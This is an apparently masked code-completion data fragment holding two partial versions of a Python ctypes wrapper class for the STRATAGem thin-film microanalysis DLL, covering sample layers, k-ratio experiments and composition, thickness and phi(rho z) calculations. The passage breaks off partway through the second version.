"step-1": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. 
\n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n <mask token>\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. 
\n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, 
density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. 
hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def 
get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n 
\n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def 
_compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n 
thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. 
If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n 
ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-2": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. 
\n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. 
\n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, 
density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. 
hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def 
get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n 
thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot 